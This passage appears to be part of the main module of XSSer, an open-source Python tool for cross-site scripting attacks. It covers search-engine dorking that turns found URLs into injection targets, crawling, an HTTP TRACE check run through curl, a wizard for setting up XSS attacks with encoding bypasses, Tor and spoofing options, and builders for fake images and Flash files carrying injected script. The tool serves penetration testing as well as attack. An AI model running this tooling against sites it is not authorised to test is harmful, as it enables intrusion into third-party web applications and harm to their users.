    2098. 

  2098.                     print("\n[Error] - Imposible to retrieve 'dorks' from file.\n")
    2099. 

  2099.                     return
    2100. 

  2100.             except:
    2101. 

  2101.                 if os.path.exists('core/fuzzing/dorks.txt') == True:
    2102. 

  2102.                     print('[Error] - Cannot open:', 'dorks.txt', "\n")
    2103. 

  2103.                     return 
    2104. 

  2104.                 else:
    2105. 

  2105.                     print('[Error] - Cannot found:', 'dorks.txt', "\n")
    2106. 

  2106.                     return
    2107. 

  2107.             if not options.dork_engine:
    2108. 

  2108.                 options.dork_engine = 'duck' # default search engine [26-08/2019]
    2109. 

  2109.             if options.dork_mass: # massive dorkering
    2110. 

  2110.                 for e in self.search_engines:
    2111. 

  2111.                     try:
    2112. 

  2112.                         dorker = Dorker(e)
    2113. 

  2113.                         for dork in dorks:
    2114. 

  2114.                             urls = dorker.dork(dork)
    2115. 

  2115.                         i = 0
    2116. 

  2116.                         for u in urls: # replace original parameter for injection keyword (XSS)
    2117. 

  2117.                             p_uri = urlparse(u)
    2118. 

  2118.                             uri = p_uri.netloc
    2119. 

  2119.                             path = p_uri.path
    2120. 

  2120.                             target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2121. 

  2121.                             for key, value in target_params.items(): # parse params to apply keywords
    2122. 

  2122.                                 for v in value:
    2123. 

  2123.                                     target_params[key] = 'XSS'
    2124. 

  2124.                             target_url_params = urllib.parse.urlencode(target_params)
    2125. 

  2125.                             u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2126. 

  2126.                             urls[i] = u
    2127. 

  2127.                             i = i + 1
    2128. 

  2128.                     except Exception as e:
    2129. 

  2129.                         for reporter in self._reporters:
    2130. 

  2130.                             reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2131. 

  2131.                     else:
    2132. 

  2132.                         if urls is not None:
    2133. 

  2133.                             for url in urls:
    2134. 

  2134.                                 for reporter in self._reporters:
    2135. 

  2135.                                     reporter.add_link(dorker.search_url, url)
    2136. 

  2136.             else:
    2137. 

  2137.                 dorker = Dorker(options.dork_engine)
    2138. 

  2138.                 try:
    2139. 

  2139.                     for dork in dorks:
    2140. 

  2140.                         urls = dorker.dork(dork)
    2141. 

  2141.                     i = 0
    2142. 

  2142.                     for u in urls: # replace original parameter for injection keyword (XSS)
    2143. 

  2143.                         p_uri = urlparse(u)
    2144. 

  2144.                         uri = p_uri.netloc
    2145. 

  2145.                         path = p_uri.path
    2146. 

  2146.                         target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2147. 

  2147.                         for key, value in target_params.items(): # parse params to apply keywords
    2148. 

  2148.                             for v in value:
    2149. 

  2149.                                 target_params[key] = 'XSS'
    2150. 

  2150.                         target_url_params = urllib.parse.urlencode(target_params)
    2151. 

  2151.                         u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2152. 

  2152.                         urls[i] = u
    2153. 

  2153.                         i = i + 1
    2154. 

  2154.                 except Exception as e:
    2155. 

  2155.                     for reporter in self._reporters:
    2156. 

  2156.                         reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2157. 

  2157.                 else:
    2158. 

  2158.                     if urls is not None:
    2159. 

  2159.                         for url in urls:
    2160. 

  2160.                             for reporter in self._reporters:
    2161. 

  2161.                                 reporter.add_link(dorker.search_url, url)
    2162. 

  2162.         if options.crawling: # crawlering target(s)
    2163. 

  2163.             nthreads = options.threads
    2164. 

  2164.             self.crawled_urls = list(urls)
    2165. 

  2165.             all_crawled = []
    2166. 

  2166.             try:
    2167. 

  2167.                 self.options.crawling = int(self.options.crawling)
    2168. 

  2168.             except:
    2169. 

  2169.                 self.options.crawling = 50
    2170. 

  2170.             if self.options.crawler_width == None:
    2171. 

  2171.                 self.options.crawler_width = 2 # default crawlering-width
    2172. 

  2172.             else:
    2173. 

  2173.                 try:
    2174. 

  2174.                     self.options.crawler_width = int(self.options.crawler_width)
    2175. 

  2175.                 except:
    2176. 

  2176.                     self.options.crawler_width = 2 # default crawlering-width
    2177. 

  2177.             if self.options.crawler_local == None:
    2178. 

  2178.                 self.options.crawler_local = False # default crawlering to LOCAL
    2179. 

  2179.             for url in set(urls):
    2180. 

  2180.                 self.report("\n[Info] Crawlering TARGET:", url, "\n\n   - Max. limit: "+ str(self.options.crawling)+ " \n   - Deep level: "+ str(options.crawler_width))
    2181. 

  2181.             crawler = Crawler(self, Curl, all_crawled,
    2182. 

  2182.                               self.pool)
    2183. 

  2183.             crawler.set_reporter(self)
    2184. 

  2184.             # now wait for all results to arrive
    2185. 

  2185.             while urls:
    2186. 

  2186.                 self.run_crawl(crawler, urls.pop(), options)
    2187. 

  2187.             while not self._landing:
    2188. 

  2188.                 for reporter in self._reporters:
    2189. 

  2189.                     reporter.report_state('broad scanning')
    2190. 

  2190.                 try:
    2191. 

  2191.                     self.pool.poll()
    2192. 

  2192.                 except NoResultsPending:
    2193. 

  2193.                     crawler.cancel()
    2194. 

  2194.                     break
    2195. 

  2195.                 if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
    2196. 

  2196.                     self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
    2197. 

  2197.                     crawler.cancel()
    2198. 

  2198.                     break
    2199. 

  2199.                 time.sleep(0.1)
    2200. 

  2200.             # re-parse crawled urls from main
    2201. 

  2201.             parsed_crawled_urls = []
    2202. 

  2202.             for u in self.crawled_urls:
    2203. 

  2203.                 if "XSS" in u:
    2204. 

  2204.                     parsed_crawled_urls.append(u)
    2205. 

  2205.                 else:
    2206. 

  2206.                     pass
    2207. 

  2207.             self.crawled_urls = parsed_crawled_urls
    2208. 

  2208.             # report parsed crawled urls
    2209. 

  2209.             self.report("\n" + "-"*25)
    2210. 

  2210.             self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)")
    2211. 

  2211.             if self.options.verbose:
    2212. 

  2212.                 self.report("")
    2213. 

  2213.                 for u in self.crawled_urls:
    2214. 

  2214.                     if '/XSS' in u:
    2215. 

  2215.                         u = u.replace("/XSS", "")
    2216. 

  2216.                     print(" - " + str(u))
    2217. 

  2217.             if len(self.crawled_urls) > 0:
    2218. 

  2218.                 self.report("")
    2219. 

  2219.             else:
    2220. 

  2220.                 self.report("-"*25)
    2221. 

  2221.                 self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
    2222. 

  2222.             return self.crawled_urls
    2223. 

  2223. 

  2224.         if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
    2225. 

  2225.             return urls
    2226. 

  2226.             
    2227. 

  2227.     def run_crawl(self, crawler, url, options):
    2228. 

  2228.         def _cb(request, result):
    2229. 

  2229.             pass
    2230. 

  2230. 

  2231.         def _error_cb(request, error):
    2232. 

  2232.             for reporter in self._reporters:
    2233. 

  2233.                 reporter.mosquito_crashed(url, str(error[0]))
    2234. 

  2234.             traceback.print_tb(error[2])
    2235. 

  2235. 

  2236.         def crawler_main(args):
    2237. 

  2237.             return crawler.crawl(*args)
    2238. 

  2238.         crawler.crawl(url, int(options.crawler_width),
    2239. 

  2239.                       int(options.crawling),options.crawler_local)
    2240. 

  2240.         
    2241. 

  2241.     def poll_workers(self):
    2242. 

  2242.         try:
    2243. 

  2243.             self.pool.poll()
    2244. 

  2244.         except NoResultsPending:
    2245. 

  2245.             pass
    2246. 

  2246. 

  2247.     def try_running(self, func, error, args=[]):
    2248. 

  2248.         """
    2249. 

  2249.         Try running a function and print some error if it fails and exists with
    2250. 

  2250.         a fatal error.
    2251. 

  2251.         """
    2252. 

  2252.         try:
    2253. 

  2253.             return func(*args)
    2254. 

  2254.         except Exception as e:
    2255. 

  2255.             self.report(error)
    2256. 

  2256.             if DEBUG:
    2257. 

  2257.                 traceback.print_exc()
    2258. 

  2258.  
    2259. 

  2259.     def check_trace(self):
    2260. 

  2260.         """
    2261. 

  2261.         Check for Cross Site Tracing (XST) vulnerability: 
    2262. 

  2262.             1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules) 
    2263. 

  2263.             2) check data sent on reply 
    2264. 

  2264.         """
    2265. 

  2265.         agents = [] # user-agents
    2266. 

  2266.         try:
    2267. 

  2267.             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    2268. 

  2268.         except:
    2269. 

  2269.             f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    2270. 

  2270.         for line in f:
    2271. 

  2271.             agents.append(line)
    2272. 

  2272.         agent = random.choice(agents).strip() # set random user-agent
    2273. 

  2273.         referer = '127.0.0.1'
    2274. 

  2274.         import subprocess, shlex
    2275. 

  2275.         self.report('='*75)
    2276. 

  2276.         self.report("\n[Info] Trying method: Cross Site Tracing (XST)\n")
    2277. 

  2277.         if self.options.xst:
    2278. 

  2278.             xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE)
    2279. 

  2279.         if self.options.target:
    2280. 

  2280.             xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE)
    2281. 

  2281.         line1 = xst.stdout.readline()
    2282. 

  2282.         if self.options.verbose:
    2283. 

  2283.             print("-"*25 + "\n")
    2284. 

  2284.             while True:
    2285. 

  2285.                 line = xst.stdout.readline()
    2286. 

  2286.                 if line != '':
    2287. 

  2287.                     print(line.rstrip())
    2288. 

  2288.                 else:
    2289. 

  2289.                     break
    2290. 

  2290.             self.report("")
    2291. 

  2291.         self.report('-'*50+"\n")
    2292. 

  2292.         if "200 OK" in line1.rstrip():
    2293. 

  2293.             print("[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)\n")
    2294. 

  2294.         else:
    2295. 

  2295.             print("[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ;-(\n")
    2296. 

  2296.         if self.options.target:
    2297. 

  2297.             self.report('='*75)
    2298. 

  2298.  
    2299. 

  2299.     def start_wizard(self):
    2300. 

  2300.         """
    2301. 

  2301.         Start Wizard Helper
    2302. 

  2302.         """
    2303. 

  2303.         #step 0: Menu
    2304. 

  2304.         ans1=True
    2305. 

  2305.         ans2=True
    2306. 

  2306.         ans3=True
    2307. 

  2307.         ans4=True
    2308. 

  2308.         ans5=True
    2309. 

  2309.         ans6=True
    2310. 

  2310. 

  2311.         #step 1: Where
    2312. 

  2312.         while ans1:
    2313. 

  2313.             print("""\nA)- Where are your targets?\n
    2314. 

  2314.              [1]- I want to enter the url of my target directly.
    2315. 

  2315.              [2]- I want to enter a list of targets from a .txt file.
    2316. 

  2316.             *[3]- I don't know where are my target(s)... I just want to explore! :-)
    2317. 

  2317.              [e]- Exit/Quit/Abort.
    2318. 

  2318.             """)
    2319. 

  2319.             ans1 = input("Your choice: [1], [2], [3] or [e]xit\n")
    2320. 

  2320.             if ans1 == "1": # from url
    2321. 

  2321.                 url = input("Target url (ex: http(s)://target.com): ")
    2322. 

  2322.                 if url.startswith("http"):
    2323. 

  2323.                     ans1 = None
    2324. 

  2324.                 else:
    2325. 

  2325.                     print("\n[Error] Your url is not valid!. Try again!")
    2326. 

  2326.                     pass
    2327. 

  2327.             elif ans1 == "2": # from file
    2328. 

  2328.                 url = input("Path to file (ex: 'targets_list.txt'): ")
    2329. 

  2329.                 if url == None:
    2330. 

  2330.                     print("\n[Error] Your are not providing a valid file. Try again!")
    2331. 

  2331.                     pass
    2332. 

  2332.                 else:
    2333. 

  2333.                     ans1 = None
    2334. 

  2334.             elif ans1 == "3": # dorking
    2335. 

  2335.                 url = "DORKING" 
    2336. 

  2336.                 ans1 = None
    2337. 

  2337.             elif (ans1 == "e" or ans1 == "E"):
    2338. 

  2338.                 print("Closing wizard...")
    2339. 

  2339.                 ans1=None
    2340. 

  2340.                 ans2=None
    2341. 

  2341.                 ans3=None
    2342. 

  2342.                 ans4=None
    2343. 

  2343.                 ans5=None
    2344. 

  2344.                 ans6=None
    2345. 

  2345.             else:
    2346. 

  2346.                 print("\nNot valid choice. Try again!")
    2347. 

  2347. 

  2348.         #step 2: How
    2349. 

  2349.         while ans2:
    2350. 

  2350.             print(22*"-")
    2351. 

  2351.             print("""\nB)- How do you want to connect?\n
    2352. 

  2352.              [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
    2353. 

  2353.              [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
    2354. 

  2354.              [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
    2355. 

  2355.             *[4]- I don't know how to connect... Just do it! :-)
    2356. 

  2356.              [e]- Exit/Quit/Abort.
    2357. 

  2357.             """)
    2358. 

  2358.             ans2 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
    2359. 

  2359.             if ans2 == "1": # using GET
    2360. 

  2360.                 payload = input("GET payload (ex: '/menu.php?q='): ")
    2361. 

  2361.                 if payload == None:
    2362. 

  2362.                     print("\n[Error] Your are providing an empty payload. Try again!")
    2363. 

  2363.                     pass
    2364. 

  2364.                 else:
    2365. 

  2365.                     self.user_template_conntype = "GET"
    2366. 

  2366.                     ans2 = None
    2367. 

  2367.             elif ans2 == "2": # using POST
    2368. 

  2368.                 payload = input("POST payload (ex: 'foo=1&bar='): ")
    2369. 

  2369.                 if payload == None:
    2370. 

  2370.                     print("\n[Error] Your are providing an empty payload. Try again!")
    2371. 

  2371.                     pass
    2372. 

  2372.                 else:
    2373. 

  2373.                     self.user_template_conntype = "POST"
    2374. 

  2374.                     ans2 = None
    2375. 

  2375.             elif ans2 == "3": # crawlering
    2376. 

  2376.                 payload = "CRAWLER" 
    2377. 

  2377.                 ans2 = None
    2378. 

  2378.             elif ans2 == "4": # crawlering
    2379. 

  2379.                 payload = "CRAWLER"
    2380. 

  2380.                 ans2 = None
    2381. 

  2381.             elif (ans2 == "e" or ans2 == "E"):
    2382. 

  2382.                 print("Closing wizard...")
    2383. 

  2383.                 ans2=None
    2384. 

  2384.                 ans3=None
    2385. 

  2385.                 ans4=None
    2386. 

  2386.                 ans5=None
    2387. 

  2387.                 ans6=None
    2388. 

  2388.             else:
    2389. 

  2389.                 print("\nNot valid choice. Try again!")
    2390. 

  2390. 

  2391.         #step 3: Proxy
    2392. 

  2392.         while ans3:
    2393. 

  2393.             print(22*"-")
    2394. 

  2394.             print("""\nC)- Do you want to be 'anonymous'?\n
    2395. 

  2395.              [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
    2396. 

  2396.              [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118. 
    2397. 

  2397.             *[3]- Yes. But I haven't any proxy. :-)
    2398. 

  2398.              [4]- No. It's not a problem for me to connect directly to the target(s).
    2399. 

  2399.              [e]- Exit/Quit.
    2400. 

  2400.             """)
    2401. 

  2401.             ans3 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
    2402. 

  2402.             if ans3 == "1": # using PROXY + spoofing
    2403. 

  2403.                 proxy = input("Enter proxy [http(s)://server:port]: ")
    2404. 

  2404.                 ans3 = None
    2405. 

  2405.             elif ans3 == "2": # using TOR + spoofing
    2406. 

  2406.                 proxy = 'Using TOR (default: http://127.0.0.1:8118)'
    2407. 

  2407.                 proxy = 'http://127.0.0.1:8118'
    2408. 

  2408.                 ans3 = None
    2409. 

  2409.             elif ans3 == "3": # only spoofing
    2410. 

  2410.                 proxy = 'Proxy: No - Spoofing: Yes' 
    2411. 

  2411.                 ans3 = None
    2412. 

  2412.             elif ans3 == "4": # no spoofing
    2413. 

  2413.                 proxy = 'Proxy: No - Spoofing: No'
    2414. 

  2414.                 ans3 = None
    2415. 

  2415.             elif (ans3 == "e" or ans3 == "E"):
    2416. 

  2416.                 print("Closing wizard...")
    2417. 

  2417.                 ans3=None
    2418. 

  2418.                 ans4=None
    2419. 

  2419.                 ans5=None
    2420. 

  2420.                 ans6=None
    2421. 

  2421.             else:
    2422. 

  2422.                 print("\nNot valid choice. Try again!")
    2423. 

  2423. 

  2424.         #step 4: Bypasser(s)
    2425. 

  2425.         while ans4:
    2426. 

  2426.             print(22*"-")
    2427. 

  2427.             print("""\nD)- Which 'bypasser(s' do you want to use?\n
    2428. 

  2428.              [1]- I want to inject XSS scripts without any encoding.
    2429. 

  2429.              [2]- Try to inject code using 'Hexadecimal'.
    2430. 

  2430.              [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
    2431. 

  2431.              [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex). 
    2432. 

  2432.             *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
    2433. 

  2433.              [e]- Exit/Quit.
    2434. 

  2434.             """)
    2435. 

  2435.             ans4 = input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
    2436. 

  2436.             if ans4 == "1": # no encode
    2437. 

  2437.                 enc = "Not using encoders"
    2438. 

  2438.                 ans4 = None
    2439. 

  2439.             elif ans4 == "2": # enc: Hex
    2440. 

  2440.                 enc = 'Hex'
    2441. 

  2441.                 ans4 = None
    2442. 

  2442.             elif ans4 == "3": # enc: Str+Une
    2443. 

  2443.                 enc = 'Str+Une' 
    2444. 

  2444.                 ans4 = None
    2445. 

  2445.             elif ans4 == "4": # enc: Mix: Une+Str+Hex
    2446. 

  2446.                 enc = "Une,Str,Hex"
    2447. 

  2447.                 ans4 = None
    2448. 

  2448.             elif ans4 == "5": # enc: no encode
    2449. 

  2449.                 enc = 'Not using encoders' 
    2450. 

  2450.                 ans4 = None
    2451. 

  2451.             elif (ans4 == "e" or ans4 == "E"):
    2452. 

  2452.                 print("Closing wizard...")
    2453. 

  2453.                 ans4=None
    2454. 

  2454.                 ans5=None
    2455. 

  2455.                 ans6=None
    2456. 

  2456.             else:
    2457. 

  2457.                 print("\nNot valid choice. Try again!")
    2458. 

  2458. 

  2459.         #step 5: Exploiting
    2460. 

  2460.         while ans5:
    2461. 

  2461.             print(22*"-")
    2462. 

  2462.             print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
    2463. 

  2463.              [1]- I want to inject a classic "Alert" message box.
    2464. 

  2464.              [2]- I want to inject my own scripts.
    2465. 

  2465.             *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
    2466. 

  2466.              [e]- Exit/Quit.
    2467. 

  2467.             """)
    2468. 

  2468.             ans5 = input("Your choice: [1], [2], [3] or [e]xit\n")
    2469. 

  2469.             if ans5 == "1": # alertbox
    2470. 

  2470.                 script = 'Alertbox'
    2471. 

  2471.                 ans5 = None
    2472. 

  2472.             elif ans5 == "2": # manual
    2473. 

  2473.                 script = input("Enter code (ex: '><script>alert('XSS');</script>): ")
    2474. 

  2474.                 if script == None:
    2475. 

  2475.                     print("\n[Error] Your are providing an empty script to inject. Try again!")
    2476. 

  2476.                     pass
    2477. 

  2477.                 else:
    2478. 

  2478.                     ans5 = None
    2479. 

  2479.             elif ans5 == "3": # no exploit
    2480. 

  2480.                 script = 'Not exploiting code' 
    2481. 

  2481.                 ans5 = None
    2482. 

  2482.             elif (ans5 == "e" or ans5 == "E"):
    2483. 

  2483.                 print("Closing wizard...")
    2484. 

  2484.                 ans5=None
    2485. 

  2485.                 ans6=None
    2486. 

  2486.             else:
    2487. 

  2487.                 print("\nNot valid choice. Try again!")
    2488. 

  2488. 

  2489.         #step 6: Final
    2490. 

  2490.         while ans6:
    2491. 

  2491.             print(22*"-")
    2492. 

  2492.             print("\nVery nice!. That's all. Your last step is to -accept or not- this template.\n")
    2493. 

  2493.             print("A)- Target:", url)
    2494. 

  2494.             print("B)- Payload:", payload)
    2495. 

  2495.             print("C)- Privacy:", proxy)
    2496. 

  2496.             print("D)- Bypasser(s):", enc)
    2497. 

  2497.             print("E)- Final:", script)
    2498. 

  2498.             print("""
    2499. 

  2499.             [Y]- Yes. Accept it and start testing!.
    2500. 

  2500.             [N]- No. Abort it?.
    2501. 

  2501.             """)
    2502. 

  2502.             ans6 = input("Your choice: [Y] or [N]\n")
    2503. 

  2503.             if (ans6 == "y" or ans6 == "Y"): # YES
    2504. 

  2504.                 start = 'YES'
    2505. 

  2505.                 print('Good fly... and happy "Cross" hacking !!! :-)\n')
    2506. 

  2506.                 ans6 = None
    2507. 

  2507.             elif (ans6 == "n" or ans6 == "N"): # NO
    2508. 

  2508.                 start = 'NO'
    2509. 

  2509.                 print("Aborted!. Closing wizard...")
    2510. 

  2510.                 ans6 = None
    2511. 

  2511.             else:
    2512. 

  2512.                 print("\nNot valid choice. Try again!")
    2513. 

  2513.             if url and payload and proxy and enc and script:
    2514. 

  2514.                 return url, payload, proxy, enc, script
    2515. 

  2515.             else:
    2516. 

  2516.                 return
    2517. 

  2517. 

  2518.     def create_fake_image(self, filename, payload):
    2519. 

  2519.         """
    2520. 

  2520.         Create -fake- image with code injected
    2521. 

  2521.         """
    2522. 

  2522.         options = self.options
    2523. 

  2523.         filename = options.imx
    2524. 

  2524.         payload = options.script
    2525. 

  2525.         image_xss_injections = ImageInjections()
    2526. 

  2526.         image_injections = image_xss_injections.image_xss(options.imx , options.script)
    2527. 

  2527.         return image_injections
    2528. 

  2528. 

  2529.     def create_fake_flash(self, filename, payload):
    2530. 

  2530.         """
    2531. 

  2531.         Create -fake- flash movie (.swf) with code injected
    2532. 

  2532.     	"""
    2533. 

  2533.         options = self.options
    2534. 

  2534.         filename = options.flash
    2535. 

  2535.         payload = options.script
    2536. 

  2536.         flash_xss_injections = FlashInjections()
    2537. 

  2537.         flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
    2538. 

  2538.         return flash_injections
    2539. 

  2539. 

  2540.     def create_gtk_interface(self):
    2541. 

  2541.         """
    2542. 

  2542.         Create GTK Interface
    2543. 

  2543.         """
    2544. 

  2544.         options = self.options
    2545. 

  2545.         from core.gtkcontroller import Controller, reactor
    2546. 

  2546.         uifile = "xsser.ui"
    2547. 

  2547.         controller = Controller(uifile, self)
    2548. 

  2548.         self._reporters.append(controller)
    2549. 

  2549.         if reactor:
    2550. 

  2550.             reactor.run()
    2551. 

  2551.         else:
    2552. 

  2552.             from gi.repository import Gtk
    2553. 

  2553.             Gtk.main()
    2554. 

  2554.         return controller
    2555. 

  2555. 

  2556.     def run(self, opts=None):
    2557. 

  2557.         """
    2558. 

  2558.         Run xsser.
    2559. 

  2559.         """
    2560. 

  2560.         #self._landing = False
    2561. 

  2561.         for reporter in self._reporters:
    2562. 

  2562.             reporter.start_attack()
    2563. 

  2563.         if opts:
    2564. 

  2564.             options = self.create_options(opts)
    2565. 

  2565.             self.set_options(options)
    2566. 

  2566.         if not self.mothership and not self.hub:
    2567. 

  2567.             self.hub = HubThread(self)
    2568. 

  2568.             self.hub.start()
    2569. 

  2569.         options = self.options
    2570. 

  2570.         if options:
    2571. 

  2571.             # step -1; order attacks
    2572. 

  2572.             if self.options.hash is True: # not fuzzing/heuristic when hash precheck
    2573. 

  2573.                 self.options.fuzz = False
    2574. 

  2574.                 self.options.script = False
    2575. 

  2575.                 self.options.coo = False
    2576. 

  2576.                 self.options.xsa = False
    2577. 

  2577.                 self.options.xsr = False
    2578. 

  2578.                 self.options.dcp = False
    2579. 

  2579.                 self.options.dom = False
    2580. 

  2580.                 self.options.inducedcode = False
    2581. 

  2581.                 self.options.heuristic = False
    2582. 

  2582.             if self.options.heuristic: # not fuzzing/hash when heuristic precheck
    2583. 

  2583.                 self.options.fuzz = False
    2584. 

  2584.                 self.options.script = False
    2585. 

  2585.                 self.options.coo = False
    2586. 

  2586.                 self.options.xsa = False
    2587. 

  2587.                 self.options.xsr = False
    2588. 

  2588.                 self.options.dcp = False
    2589. 

  2589.                 self.options.dom = False
    2590. 

  2590.                 self.options.inducedcode = False
    2591. 

  2591.                 self.options.hash = False
    2592. 

  2592.             if self.options.Cem: # parse input at CEM for blank spaces
    2593. 

  2593.                 self.options.Cem = self.options.Cem.replace(" ","")
    2594. 

  2594.         else:
    2595. 

  2595.             pass
    2596. 

  2596.         # step 0: third party tricks
    2597. 

  2597.         try:
    2598. 

  2598.             if self.options.imx: # create -fake- image with code injected
    2599. 

  2599.                 p = self.optionParser
    2600. 

  2600.                 self.report('='*75)
    2601. 

  2601.                 self.report(str(p.version))
    2602. 

  2602.                 self.report('='*75)
    2603. 

  2603.                 self.report("[Image XSS Builder]...")
    2604. 

  2604.                 self.report('='*75)
    2605. 

  2605.                 self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
    2606. 

  2606.                 self.report('='*75 + "\n")
    2607. 

  2607.         except:
    2608. 

  2608.             return
    2609. 

  2609. 

  2610.         if options.flash: # create -fake- flash movie (.swf) with code injected
    2611. 

  2611.             p = self.optionParser
    2612. 

  2612.             self.report('='*75)
    2613. 

  2613.             self.report(str(p.version))
    2614. 

  2614.             self.report('='*75)
    2615. 

  2615.             self.report("[Flash Attack! XSS Builder]...")
    2616. 

  2616.             self.report('='*75)
    2617. 

  2617.             self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
    2618. 

  2618.             self.report('='*75 + "\n")
    2619. 

  2619. 

  2620.         if options.xsser_gtk:
    2621. 

  2621.             self.create_gtk_interface()
    2622. 

  2622.             return
    2623. 

  2623. 

  2624.         if self.options.wizard: # start a wizard helper
    2625. 

  2625.             p = self.optionParser
    2626. 

  2626.             self.report('='*75)
    2627. 

  2627.             self.report(str(p.version))
    2628. 

  2628.             self.report('='*75)
    2629. 

  2629.             self.report("[Wizard] Generating XSS attack...")
    2630. 

  2630.             self.report('='*75)
    2631. 

  2631.             self.user_template = self.start_wizard()
    2632. 

  2632. 

  2633.         if self.options.xst: # check for cross site tracing
    2634. 

  2634.             p = self.optionParser
    2635. 

  2635.             if not self.options.target:
    2636. 

  2636.                 self.report('='*75)
    2637. 

  2637.                 self.report(str(p.version))
    2638. 

  2638.                 self.report('='*75)
    2639. 

  2639.                 self.report("[XST Attack!] checking for HTTP TRACE method ...")
    2640. 

  2640.                 self.report('='*75)
    2641. 

  2641.             self.check_trace()
    2642. 

  2642. 

  2643.         if options.checktor:
    2644. 

  2644.             url = self.check_tor_url # TOR status checking site
    2645. 

  2645.             print('='*75)
    2646. 

  2646.             print("")
    2647. 

  2647.             print("        _                         ")
    2648. 

  2648.             print("       /_/_      .'''.            ")
    2649. 

  2649.             print("    =O(_)))) ...'     `.          ")
    2650. 

  2650.             print("       \_\              `.    .'''")
    2651. 

  2651.             print("                          `..'    ") 
    2652. 

  2652.             print("")
    2653. 

  2653.             print('='*75)
    2654. 

  2654.             agents = [] # user-agents
    2655. 

  2655.             try:
    2656. 

  2656.                 f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    2657. 

  2657.             except:
    2658. 

  2658.                 f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    2659. 

  2659.             for line in f:
    2660. 

  2660.                 agents.append(line)
    2661. 

  2661.             agent = random.choice(agents).strip() # set random user-agent
    2662. 

  2662.             referer = "127.0.0.1"
    2663. 

  2663.             print("\nSending request to: " + url + "\n")
    2664. 

  2664.             print("-"*25+"\n")
    2665. 

  2665.             headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer
    2666. 

  2666.             try:
    2667. 

  2667.                 import urllib.request, urllib.error, urllib.parse
    2668. 

  2668.                 req = urllib.request.Request(url, None, headers)
    2669. 

  2669.                 tor_reply = urllib.request.urlopen(req).read()
    2670. 

  2670.                 your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
    2671. 

  2671.                 if not tor_reply or 'Congratulations' not in tor_reply:
    2672. 

  2672.                     print("It seems that Tor is not properly set.\n")
    2673. 

  2673.                     print(("IP address appears to be: " + your_ip + "\n"))
    2674. 

  2674.                 else:
    2675. 

  2675.                     print("Congratulations!. Tor is properly being used :-)\n")
    2676. 

  2676.                     print(("IP address appears to be: " + your_ip + "\n"))
    2677. 

  2677.             except:
    2678. 

  2678.                 print("[Error] Cannot reach TOR checker system!. Are you connected?\n")
    2679. 

  2679.                 sys.exit(2) # return
    2680. 

  2680. 

  2681.         nthreads = max(1, abs(options.threads))
    2682. 

  2682.         nworkers = len(self.pool.workers)
    2683. 

  2683.         if nthreads != nworkers:
    2684. 

  2684.             if nthreads < nworkers:
    2685. 

  2685.                 self.pool.dismissWorkers(nworkers-nthreads)
    2686. 

  2686.             else:
    2687. 

  2687.                 self.pool.createWorkers(nthreads-nworkers)
    2688. 

  2688. 

  2689.         for reporter in self._reporters:
    2690. 

  2690.             reporter.report_state('scanning')
    2691. 

  2691.         
    2692. 

  2692.         # step 1: get urls
    2693. 

  2693.         urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-\n")
    2694. 

  2694.         for reporter in self._reporters:
    2695. 

  2695.             reporter.report_state('arming')
    2696. 

  2696.         
    2697. 

  2697.         # step 2: get payloads
    2698. 

  2698.         payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-\n")
    2699. 

  2699.         for reporter in self._reporters:
    2700. 

  2700.             reporter.report_state('cloaking')
    2701. 

  2701.         if options.Dwo:
    2702. 

  2702.             payloads = self.process_payloads_ipfuzzing(payloads)
    2703. 

  2703.         elif options.Doo:
    2704. 

  2704.             payloads = self.process_payloads_ipfuzzing_octal(payloads)
    2705. 

  2705.         for reporter in self._reporters:
    2706. 

  2706.             reporter.report_state('locking targets')
    2707. 

  2707. 

  2708.         # step 3: get query string
    2709. 

  2709.         query_string = self.try_running(self.get_query_string, "\n[Error] Internal problems getting query -string-\n")
    2710. 

  2710.         for reporter in self._reporters:
    2711. 

  2711.             reporter.report_state('sanitize')
    2712. 

  2712.         urls = self.sanitize_urls(urls)
    2713. 

  2713.         for reporter in self._reporters:
    2714. 

  2714.             reporter.report_state('attack')
    2715. 

